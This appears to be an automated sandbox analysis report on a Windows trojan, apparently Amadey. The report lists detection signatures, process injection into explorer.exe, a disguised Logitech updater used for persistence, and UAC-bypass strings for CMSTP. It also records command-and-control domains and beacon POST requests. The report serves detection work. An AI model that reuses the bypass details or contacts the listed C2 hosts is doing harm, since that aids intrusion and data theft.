Windows Analysis Report
5Z1WFRMTOXRH6X21Z8NU8.exe

Overview

General Information

Sample name: 5Z1WFRMTOXRH6X21Z8NU8.exe
Analysis ID: 1542426
MD5: ff827141856089465cec7afdc9e65f9d
SHA1: e985a1d59d90a6522b4077b00bc68c86fc3d72d8
SHA256: 389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
Tags: exe, user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 5Z1WFRMTOXRH6X21Z8NU8.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe" MD5: FF827141856089465CEC7AFDC9E65F9D)
    • more.com (PID: 7360 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4348 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • logioptionsplus_updater.exe (PID: 7984 cmdline: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe MD5: FF827141856089465CEC7AFDC9E65F9D)
  • logioptionsplus_updater.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe" MD5: FF827141856089465CEC7AFDC9E65F9D)
    • more.com (PID: 8152 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 3492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
No configs have been found
Yara matches (initial sample)

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe  Rule: JoeSecurity_DelphiSystemParamCount  Description: Detected Delphi use of System.ParamCount()  Author: Joe Security

Yara matches (memory dumps)

Source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
(5 of 9 entries shown)

Yara matches (unpacked PEs)

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack  Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM  Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)  Author: ditekSHen  Strings:
  • 0x1dc88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1df14:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1dd13:$s1: CoGetObject
  • 0x1df9f:$s1: CoGetObject
  • 0x1dc6c:$s2: Elevation:Administrator!new:
  • 0x1def8:$s2: Elevation:Administrator!new:
Source: 1.2.more.com.4652b57.4.raw.unpack  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
Source: 1.2.more.com.4652b57.4.raw.unpack  Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM  Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)  Author: ditekSHen  Strings:
  • 0x1dc88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1df14:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1dd13:$s1: CoGetObject
  • 0x1df9f:$s1: CoGetObject
  • 0x1dc6c:$s2: Elevation:Administrator!new:
  • 0x1def8:$s2: Elevation:Administrator!new:
Source: 16.2.explorer.exe.5211b57.6.raw.unpack  Rule: JoeSecurity_UACBypassusingCMSTP  Description: Yara detected UAC Bypass using CMSTP  Author: Joe Security
(5 of 30 entries shown)

Sigma

No Sigma rule has matched

Suricata IDS alerts

Timestamp: 2024-10-25T22:43:37.141787+0200  SID: 2856147  Severity: 1  Classtype: A Network Trojan was detected  Source: 192.168.2.4:49838  Destination: 188.114.97.3:80  Protocol: TCP
Timestamp: 2024-10-25T22:43:38.925555+0200  SID: 2856148  Severity: 1  Classtype: A Network Trojan was detected  Source: 192.168.2.4:49838  Destination: 188.114.97.3:80  Protocol: TCP


                    AV Detection

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe  ReversingLabs: Detection: 18%
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\cnfpnteryde  Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw  Joe Sandbox ML: detected

                    Exploits

Source: Yara match  File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: 5Z1WFRMTOXRH6X21Z8NU8.exe PID: 7308, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: more.com PID: 7360, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: logioptionsplus_updater.exe PID: 7984, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: more.com PID: 8152, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: explorer.exe PID: 4348, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: explorer.exe PID: 3492, type: MEMORYSTR
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\more.com  Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\explorer.exe  Code function: 14_2_0079ED13 FindFirstFileExW, 14_2_0079ED13

                    Networking

Source: Network traffic  Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49838 -> 188.114.97.3:80
Source: Network traffic  Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49838 -> 188.114.97.3:80
Source: C:\Windows\SysWOW64\explorer.exe  Network Connect: 188.114.97.3 80
Source: global traffic  HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1  Content-Type: application/x-www-form-urlencoded  Host: artvisions-autoinsider.com  Content-Length: 4  Cache-Control: no-cache  Data Raw: 73 74 3d 73  Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178
Source: Joe Sandbox View  IP Address: 188.114.97.3
Source: Joe Sandbox View  IP Address: 188.114.97.3
Source: Joe Sandbox View  ASN Name: CLOUDFLARENETUS
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\explorer.exe  Code function: 14_2_00770370 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile, 14_2_00770370
Source: global traffic  DNS traffic detected: DNS query: artvisions-autoinsider3.com
Source: global traffic  DNS traffic detected: DNS query: artvisions-autoinsider.com
Source: global traffic  DNS traffic detected: DNS query: artvisions-autoinsider2.com
Source: unknown  HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1  Content-Type: application/x-www-form-urlencoded  Host: artvisions-autoinsider.com  Content-Length: 4  Cache-Control: no-cache  Data Raw: 73 74 3d 73  Data Ascii: st=s
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider.com/5
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php&
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpH
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpQ
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php0
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php?
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpM
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpdu
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider2.com/c
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider3.com/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php(
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.phpP
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://artvisions-autoinsider3.com/S
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestamp
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestampNhttps://ca.signfiles.com/TSAServer.aspx
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
                    Source: logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
                    Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/&4D
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/ndows.
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/property#
